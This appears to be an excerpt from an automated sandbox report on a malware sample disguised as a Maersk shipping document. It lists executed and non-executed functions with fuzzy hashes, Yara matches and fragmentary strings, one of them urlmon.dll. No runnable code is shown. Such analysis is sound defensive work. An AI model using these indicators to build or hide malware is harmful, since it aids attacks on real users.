                                                    • Opcode ID: ac6b8687aff72526df4f328deb582478113900551d9526e7ad79afc4b6190ef3
                                                    • Instruction ID: 0c44c4e4401baebd21901e1e060307798cb64001b3176ca05d04c2b1631c635e
                                                    • Opcode Fuzzy Hash: ac6b8687aff72526df4f328deb582478113900551d9526e7ad79afc4b6190ef3
                                                    • Instruction Fuzzy Hash: F541E3313047069FDB21DE29C840B6AF7F5EF9A720F100A6DFA5AD7280DB31E5458B91
                                                    Function 017DB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0181728C
                                                    Strings
                                                    • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01817294
                                                    • RTL: Resource at %p, xrefs: 018172A3
                                                    • RTL: Re-Waiting, xrefs: 018172C1
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                    • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                    • API String ID: 885266447-605551621
                                                    • Opcode ID: fbd12a72b931ab109e5a1d1667b28c6575924fc26cbf5c374424268c1c7c4811
                                                    • Instruction ID: c56a07a522e8e8623b692b004a18d2d4df4dfdb996fda41b1463ec5fa351dc4b
                                                    • Opcode Fuzzy Hash: fbd12a72b931ab109e5a1d1667b28c6575924fc26cbf5c374424268c1c7c4811
                                                    • Instruction Fuzzy Hash: 6941F032600206ABDB21DE29CC41FA6F7B9FB99710F24061DFA56EB240DB20E942C7D1
                                                    Function 01852300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID: ___swprintf_l
                                                    • String ID: %%%u$]:%u
                                                    • API String ID: 48624451-3050659472
                                                    • Opcode ID: 096d43808c39ec470322d3024f4e62b4412deb20f2133a039427990fc5784993
                                                    • Instruction ID: fce7c2ad759cbcab1371941371187a9fa2a4f8b2db4846993e0435e5ebae4259
                                                    • Opcode Fuzzy Hash: 096d43808c39ec470322d3024f4e62b4412deb20f2133a039427990fc5784993
                                                    • Instruction Fuzzy Hash: D8318772A00119DFDB60DE2DDC44BEEB7F9EB44710F440559ED49D3201EF309A488B60
                                                    Function 017E7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID: __aulldvrm
                                                    • String ID: +$-
                                                    • API String ID: 1302938615-2137968064
                                                    • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                    • Instruction ID: c8b77c1f8d1381a3d17b5fb2968951b1e143b6e20e17d43ae3621f895eeb25da
                                                    • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                    • Instruction Fuzzy Hash: 9791A271E002169BEB28DF6DC889ABEFBE5FF4C320F54451AE955E72C4E73089818791
                                                    Function 017A9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $$@
                                                    • API String ID: 0-1194432280
                                                    • Opcode ID: 62bcec01cf40b6d5309fdef71a45226ea49ef5667ee0ab4687e4e71801a76f57
                                                    • Instruction ID: 7e5972e44cdd7518fcaa101ebe1deca91af4f53c9fa707221903119987c2c69d
                                                    • Opcode Fuzzy Hash: 62bcec01cf40b6d5309fdef71a45226ea49ef5667ee0ab4687e4e71801a76f57
                                                    • Instruction Fuzzy Hash: E6812D71D012699BDB76CF54CC49BEEB7B4AB48714F0041EAEA19B7280E7705E84CFA0

                                                    Executed Functions

                                                    Function 0250670D Relevance: 31.7, Strings: 25, Instructions: 469COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2537606826.0000000002280000.00000040.00000001.00040000.00000000.sdmp, Offset: 02280000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_2280000_FeNbdhmZHKN.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: #$ B$#$%y$19$2$>$D$E$GP$K_$PP$Qt$V$`J$c6$f$m$o$v>$x$}$,$>$_
                                                    • API String ID: 0-1984175023
                                                    • Opcode ID: 1ced2e54b750a51ef126d58c66254e63b3decfbe649bb02d121449521f8bf1ee
                                                    • Instruction ID: f3f4a19c0c3aa7dd6721a11505c4176f80662abfc896c641ecca1e3321e95f18
                                                    • Opcode Fuzzy Hash: 1ced2e54b750a51ef126d58c66254e63b3decfbe649bb02d121449521f8bf1ee
                                                    • Instruction Fuzzy Hash: 5D429CB0D05269CBEB68CF05CD95BDDBBB2BB45308F1085D9D5096B280CBB96AD4CF84
                                                    Function 0251448D Relevance: 6.4, Strings: 5, Instructions: 152COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2537606826.0000000002280000.00000040.00000001.00040000.00000000.sdmp, Offset: 02280000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_2280000_FeNbdhmZHKN.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 6$O$S$\$s
                                                    • API String ID: 0-3854637164
                                                    • Opcode ID: 74f2a845a8c98f1cbd2e33735c6ec5c448920ce1012c5b9301475194a65474ab
                                                    • Instruction ID: a32a0e1c7dbe1d3e3b397aad5cb5226ba5dd6c3ca1886f419c1ef4ed29b5e577
                                                    • Opcode Fuzzy Hash: 74f2a845a8c98f1cbd2e33735c6ec5c448920ce1012c5b9301475194a65474ab
                                                    • Instruction Fuzzy Hash: 0C519472D00119ABDB10EF94DD88EEEF7B8FF85319F044199E90867180E7756A48CFA5
                                                    Function 025216DD Relevance: 1.3, Strings: 1, Instructions: 65COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2537606826.0000000002280000.00000040.00000001.00040000.00000000.sdmp, Offset: 02280000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_2280000_FeNbdhmZHKN.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: yi
                                                    • API String ID: 0-2336885180
                                                    • Opcode ID: 7e633b2ae547646173275aff670ba6d686053eb1c4c3826f853a7315fe6ab9b1
                                                    • Instruction ID: ae51c03d3e015149392d8002633a368d94bd2f682614255f92e48d029190da6a
                                                    • Opcode Fuzzy Hash: 7e633b2ae547646173275aff670ba6d686053eb1c4c3826f853a7315fe6ab9b1
                                                    • Instruction Fuzzy Hash: 2121EDB6D01219AF8B00DFE9D8408EFBBF9EF88210F04456AE919E7240E7715A458FA0
                                                    Function 024FFD2F Relevance: .1, Instructions: 136COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2537606826.0000000002280000.00000040.00000001.00040000.00000000.sdmp, Offset: 02280000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_2280000_FeNbdhmZHKN.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 83c8bc8962ae1cda7f0d8d7b3d7564616a9d97dafb668fcbcb9444032b6bf7e8
                                                    • Instruction ID: 3ccc6b93f0969c41b18d5a4386c57f5c8b92a6c26b655f94ceed318b8062a9c7
                                                    • Opcode Fuzzy Hash: 83c8bc8962ae1cda7f0d8d7b3d7564616a9d97dafb668fcbcb9444032b6bf7e8
                                                    • Instruction Fuzzy Hash: 844130B1D11219AFDB00CF99C885AEEBBBCFF49710F10415AFA14E6280E3B09645CFA4
                                                    Function 02524DFD Relevance: .1, Instructions: 85COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2537606826.0000000002280000.00000040.00000001.00040000.00000000.sdmp, Offset: 02280000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_2280000_FeNbdhmZHKN.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f413d01f484df2d047b2e8d45919c4bb039abd2104dac6aa64f115fee20feb2e
                                                    • Instruction ID: 4aa9e452250d1a00459ed59b9cd6bd66c24f013b3556d6be25d049caa0d0084a
                                                    • Opcode Fuzzy Hash: f413d01f484df2d047b2e8d45919c4bb039abd2104dac6aa64f115fee20feb2e
                                                    • Instruction Fuzzy Hash: B03116B5A00249ABDB14DF99D840EEFB7F9EF89300F108119F908A7380E774A915CFA5
                                                    Function 025256FD Relevance: .1, Instructions: 77COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2537606826.0000000002280000.00000040.00000001.00040000.00000000.sdmp, Offset: 02280000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_2280000_FeNbdhmZHKN.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 218d563c39c0a71cd3337df9d9d62a9197f35fc4b4fe87b00bf36fddaed69bb2
                                                    • Instruction ID: a1372a4afe10f0202fa8b35af49269a431bc1599dc17f269e24e8bd58d8abc68
                                                    • Opcode Fuzzy Hash: 218d563c39c0a71cd3337df9d9d62a9197f35fc4b4fe87b00bf36fddaed69bb2
                                                    • Instruction Fuzzy Hash: E82119B5A00209AFDB14DF99DC41FAFB7B9EF89700F104109F918AB280E774A915CFA5
                                                    Function 025142CD Relevance: .1, Instructions: 75COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2537606826.0000000002280000.00000040.00000001.00040000.00000000.sdmp, Offset: 02280000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_2280000_FeNbdhmZHKN.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 963cbaa09def02e4d1eb9250690dfd1d3dff3227b0342066ff4c39344effe0cf
                                                    • Instruction ID: 9b1999c924407c1da2dd730a2200e8cecfc6ac830ee4197764b363d465091b7d
                                                    • Opcode Fuzzy Hash: 963cbaa09def02e4d1eb9250690dfd1d3dff3227b0342066ff4c39344effe0cf
                                                    • Instruction Fuzzy Hash: ED11A9B23803157BF7209A55DC43FAB775DEBC5B55F244015FB08AE1C0E6A4B8154AB8
                                                    Function 02524A9D Relevance: .1, Instructions: 65COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2537606826.0000000002280000.00000040.00000001.00040000.00000000.sdmp, Offset: 02280000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_2280000_FeNbdhmZHKN.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 65140a3b059ee79970d215b499d4bce6e3d18515d929f97248ad41fbe4fefd5c
                                                    • Instruction ID: 56109f82a43559a31f9eac7d37893eddccbfeec66aeeb16ce553af0f803ce3f6
                                                    • Opcode Fuzzy Hash: 65140a3b059ee79970d215b499d4bce6e3d18515d929f97248ad41fbe4fefd5c
                                                    • Instruction Fuzzy Hash: 8F118E71A00319ABD710EF59DC41FAB77ADEB86710F004509FA18AB2C0E7706905CFA5
                                                    Function 02524C1D Relevance: .1, Instructions: 65COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2537606826.0000000002280000.00000040.00000001.00040000.00000000.sdmp, Offset: 02280000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_2280000_FeNbdhmZHKN.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a4ead1439963b26653c200fde1fbbf3326f591bd6fe7ccce56ac6fc5d71bfee7
                                                    • Instruction ID: 1f135eabfb3118a4111dbce7718f544b48d82e3af09fec809ca3cedc16fda974
                                                    • Opcode Fuzzy Hash: a4ead1439963b26653c200fde1fbbf3326f591bd6fe7ccce56ac6fc5d71bfee7
                                                    • Instruction Fuzzy Hash: 60118B71A00319BBD710EF59DC45FAFB7ADEB86700F10444AFA58AB2C0E6746904CFA5
                                                    Function 02522A1D Relevance: .1, Instructions: 63COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2537606826.0000000002280000.00000040.00000001.00040000.00000000.sdmp, Offset: 02280000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_2280000_FeNbdhmZHKN.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b9ff44f630e79ce15d8ce08663523b67a53b04885dae65d290f6903aa3378063
                                                    • Instruction ID: 3d8255523bb40af4b4b7bca6a7d831b7de1c8f75edef596bb9357ae09885757b
                                                    • Opcode Fuzzy Hash: b9ff44f630e79ce15d8ce08663523b67a53b04885dae65d290f6903aa3378063
                                                    • Instruction Fuzzy Hash: 7C1100B6D0121DAF9B00DFA9D8419EEBBF9EF48210F44415FE919E7240E7715A05CFA0
                                                    Function 02525A3D Relevance: .0, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2537606826.0000000002280000.00000040.00000001.00040000.00000000.sdmp, Offset: 02280000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_2280000_FeNbdhmZHKN.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ba0705d331adb0827d90e0a0c05e4e99946108ce1be150fedcd619b1613f899a
                                                    • Instruction ID: 9f9c3f448db16fd83dc7d97602a51b5827709ff56805e1bd1c28bc1f59865f1a
                                                    • Opcode Fuzzy Hash: ba0705d331adb0827d90e0a0c05e4e99946108ce1be150fedcd619b1613f899a
                                                    • Instruction Fuzzy Hash: 3D01C0B2215108BBCB44DE99DC90EEB77ADEF8D750F108208BA09E3240D630F8518BA4
                                                    Function 0252164D Relevance: .0, Instructions: 46COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2537606826.0000000002280000.00000040.00000001.00040000.00000000.sdmp, Offset: 02280000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_2280000_FeNbdhmZHKN.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b126ddd99a82b0e6a5761decd8d6853ac45a813b476234a54d0b7561d2c41cb1
                                                    • Instruction ID: e5c521ba77fdad149b197c05eb2f025e665b11985a35975bb42374e9541ef925
                                                    • Opcode Fuzzy Hash: b126ddd99a82b0e6a5761decd8d6853ac45a813b476234a54d0b7561d2c41cb1
                                                    • Instruction Fuzzy Hash: D801D7B2C01219AFCB40DFE8D9809EEBBF9AB48200F1442AAD519F3240E7705A048FA1
                                                    Function 024FFE81 Relevance: .0, Instructions: 42COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2537606826.0000000002280000.00000040.00000001.00040000.00000000.sdmp, Offset: 02280000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_2280000_FeNbdhmZHKN.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: cdd70f869fbf5487031d0afd2b1b7b48b218c4ec3db5d7e01abbeb37a10cc71c
                                                    • Instruction ID: da8c040195023dc9d87f0967595d34e3446342d38b96f997b43fc4d2ae8d2a24
                                                    • Opcode Fuzzy Hash: cdd70f869fbf5487031d0afd2b1b7b48b218c4ec3db5d7e01abbeb37a10cc71c
                                                    • Instruction Fuzzy Hash: 7BF0B4732102126FD7605A5DEC84B9AB79CEBC4328F150223FA1D9B6D1E732949586A0
                                                    Function 02514484 Relevance: .0, Instructions: 37COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2537606826.0000000002280000.00000040.00000001.00040000.00000000.sdmp, Offset: 02280000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_2280000_FeNbdhmZHKN.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 75cd10afc6497bc7a15310c65ed230a475c283ab31228889cdcd35a57f93b811
                                                    • Instruction ID: 6ae098b53bcc9f4bf0c6932903bdd6b50b7f0c9d729536fd50c8704137e16440
                                                    • Opcode Fuzzy Hash: 75cd10afc6497bc7a15310c65ed230a475c283ab31228889cdcd35a57f93b811
                                                    • Instruction Fuzzy Hash: ECF0F4728082956EDB11EBA0CC84EEABF74AFC6310F0441C9E4086B2D1D674698ACB59
                                                    Function 02524D1D Relevance: .0, Instructions: 33COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2537606826.0000000002280000.00000040.00000001.00040000.00000000.sdmp, Offset: 02280000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_2280000_FeNbdhmZHKN.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 17a7bc8f7d8520c4bffdc9816d876c5e0740f6373924b595003b5f186f1b3574
                                                    • Instruction ID: 0c4314ad13fff4748819e0fe30f799d07176115b10cb79bfa85982e19b4d16b7
                                                    • Opcode Fuzzy Hash: 17a7bc8f7d8520c4bffdc9816d876c5e0740f6373924b595003b5f186f1b3574
                                                    • Instruction Fuzzy Hash: 8DF01C76200209BBDB10EE89DC81E9B77ADEFC9710F004019BE1897281D670B9118BF4
                                                    Function 025143ED Relevance: .0, Instructions: 29COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2537606826.0000000002280000.00000040.00000001.00040000.00000000.sdmp, Offset: 02280000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_2280000_FeNbdhmZHKN.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: bda29215af404e63ea5841a5bf47159a533bd7fbcf7b6c61d1dc4e162ad7e555
                                                    • Instruction ID: 2afd132f2e0c1f998bae7da91d13941b29962013989d7060ca5ec85db643adb4
                                                    • Opcode Fuzzy Hash: bda29215af404e63ea5841a5bf47159a533bd7fbcf7b6c61d1dc4e162ad7e555
                                                    • Instruction Fuzzy Hash: 2EF08271815209EBDB14DFA4D841BDDBBB4EB44320F108369E8289B2C0D734A7558B95
                                                    Function 0252597D Relevance: .0, Instructions: 29COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2537606826.0000000002280000.00000040.00000001.00040000.00000000.sdmp, Offset: 02280000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_2280000_FeNbdhmZHKN.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ac00b1638777126d2cea74cea7df9c0d5320b23dccd002bc6f264aef07eeb62c
                                                    • Instruction ID: e8dc5cc8198fe409f74dc87bebfba522109b96a93a0143eab9b54abcde455a17
                                                    • Opcode Fuzzy Hash: ac00b1638777126d2cea74cea7df9c0d5320b23dccd002bc6f264aef07eeb62c
                                                    • Instruction Fuzzy Hash: B0E09A72200218BBC614EF9AEC40F9B33ADEFC9B10F000409FA08A7281D671B9108BB8
                                                    Function 025277BD Relevance: .0, Instructions: 28COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2537606826.0000000002280000.00000040.00000001.00040000.00000000.sdmp, Offset: 02280000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_2280000_FeNbdhmZHKN.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0a49911327731111d187c10d9df807f6481cb23bdff532a9ce64d2e3ccaf779b
                                                    • Instruction ID: 6ffda75a8e02e1cd2fb91d4c8cb5608a195d7141bd4f542a8a91905abb29b68c
                                                    • Opcode Fuzzy Hash: 0a49911327731111d187c10d9df807f6481cb23bdff532a9ce64d2e3ccaf779b
                                                    • Instruction Fuzzy Hash: 60E0863264023437D224A6999C05F5BB75DDBCAE70F090065FE189B3C0F660F906C6E9
                                                    Function 0252566D Relevance: .0, Instructions: 25COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2537606826.0000000002280000.00000040.00000001.00040000.00000000.sdmp, Offset: 02280000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_2280000_FeNbdhmZHKN.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2f59229fe5a35477addfa38c4a351323b046b53500d51ab444dffaebc889c80f
                                                    • Instruction ID: cc02cf9ee80eec4a45c360589a0ec95761efa4c02ae21cc0c54256a25e18d161
                                                    • Opcode Fuzzy Hash: 2f59229fe5a35477addfa38c4a351323b046b53500d51ab444dffaebc889c80f
                                                    • Instruction Fuzzy Hash: 38E08C36200615BBD220FA9ADC00F9BB7ADFFC6B20F004019FB08A7281C670B9148BB0
                                                    Function 02507139 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2537606826.0000000002280000.00000040.00000001.00040000.00000000.sdmp, Offset: 02280000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_2280000_FeNbdhmZHKN.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2730d1f77fc109b5a47d9fe3ca0a6293cafa887ce2be5d70882dbadab973652c
                                                    • Instruction ID: d773aaeb79a287b9659e7f7af9bb4b32ca28a3e64a653523d97dc297dae88b17
                                                    • Opcode Fuzzy Hash: 2730d1f77fc109b5a47d9fe3ca0a6293cafa887ce2be5d70882dbadab973652c
                                                    • Instruction Fuzzy Hash:

                                                    Non-executed Functions

                                                    Function 0251EC0D Relevance: 34.0, Strings: 27, Instructions: 265COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2537606826.0000000002280000.00000040.00000001.00040000.00000000.sdmp, Offset: 02280000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_2280000_FeNbdhmZHKN.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $$$$%$)$)$.$5$>$B$E$F$F$H$J$Q$T$g$h$i$m$s$u$urlmon.dll$v$w$}$}
                                                    • API String ID: 0-1002149817
                                                    • Opcode ID: 4d06f275a8043cd661dc09b1a28e8be5988d937cb3f8b290f1dde54db9b9bf86
                                                    • Instruction ID: eae90c878419fab9570930e2709e645a72a402cdf10725352d144fa770c99c9d
                                                    • Opcode Fuzzy Hash: 4d06f275a8043cd661dc09b1a28e8be5988d937cb3f8b290f1dde54db9b9bf86
                                                    • Instruction Fuzzy Hash: 77C120B1D002299EDB20DFA5CC44BEEBBB9BF49304F0041D9E548A7281E7B55A88CF65
                                                    Function 025066DA Relevance: 31.4, Strings: 25, Instructions: 152COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2537606826.0000000002280000.00000040.00000001.00040000.00000000.sdmp, Offset: 02280000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_2280000_FeNbdhmZHKN.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: #$ B$#$%y$19$2$>$D$E$GP$PP$Qt$V$`J$c6$f$m$o$v>$x$y$}$,$>$_
                                                    • API String ID: 0-4064015928
                                                    • Opcode ID: f9c0323d79a86cf96ea87b235a2e149c65fd8ba9be13959325738da97b8e7f17
                                                    • Instruction ID: bebbfb41eaa8c82e31f22d9fef3e38e706f5ebf0e675296d7e5d8712e5992e8a
                                                    • Opcode Fuzzy Hash: f9c0323d79a86cf96ea87b235a2e149c65fd8ba9be13959325738da97b8e7f17
                                                    • Instruction Fuzzy Hash: 9EA178B0D05669CBFB61CF81C9987CEBBB1BB45308F1081D9C14C2B281C7BA1A99CF95
                                                    Function 0251729D Relevance: 16.4, Strings: 13, Instructions: 194COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2537606826.0000000002280000.00000040.00000001.00040000.00000000.sdmp, Offset: 02280000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_2280000_FeNbdhmZHKN.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                    • API String ID: 0-392141074
                                                    • Opcode ID: 080871b2f831aeba83b25e39561e0cc75b6ac08220c0dbab3a8b1a0380a8890f
                                                    • Instruction ID: e3b91ad184b7e67867d648a59d9a1c079089d40b84109cc502ec3559607fc705
                                                    • Opcode Fuzzy Hash: 080871b2f831aeba83b25e39561e0cc75b6ac08220c0dbab3a8b1a0380a8890f
                                                    • Instruction Fuzzy Hash: E1710CB1C0022CAADB15DB94CC81FEEB7B9BF48700F048599E519A6180E7755B48CFA5
                                                    Function 02517293 Relevance: 16.4, Strings: 13, Instructions: 181COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2537606826.0000000002280000.00000040.00000001.00040000.00000000.sdmp, Offset: 02280000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_2280000_FeNbdhmZHKN.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                    • API String ID: 0-392141074
                                                    • Opcode ID: 2d4c76c84092abe7bd97bac7b333bd4c3e69f1e84a1674ff772b68cb33053c76
                                                    • Instruction ID: a52a49ad57632b3ad8c6a0ccac2399c225ca92c7b86b485b26e01c0019989d85
                                                    • Opcode Fuzzy Hash: 2d4c76c84092abe7bd97bac7b333bd4c3e69f1e84a1674ff772b68cb33053c76
                                                    • Instruction Fuzzy Hash: BD612CB1C10228AAEB15DFA4CC81FEEB7B9BF49700F04859DE519A61C0E7715B48CF65
                                                    Function 0250AF54 Relevance: 13.8, Strings: 11, Instructions: 87COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2537606826.0000000002280000.00000040.00000001.00040000.00000000.sdmp, Offset: 02280000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_2280000_FeNbdhmZHKN.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                    • API String ID: 0-685823316
                                                    • Opcode ID: 6419724ab03b44f927eb6cf9b7928965be4c5f36b2f2f73e8572da932dcbbfa9
                                                    • Instruction ID: 2476a082d6b9d51d0a8b25ba7156e0055175eb4ccb7c01d05207ee802c4385fd
                                                    • Opcode Fuzzy Hash: 6419724ab03b44f927eb6cf9b7928965be4c5f36b2f2f73e8572da932dcbbfa9
                                                    • Instruction Fuzzy Hash: 443152B1D41218AAEB50DFD4CC84FEEBBB9BF48704F00815DE618BA180DBB556488FA5
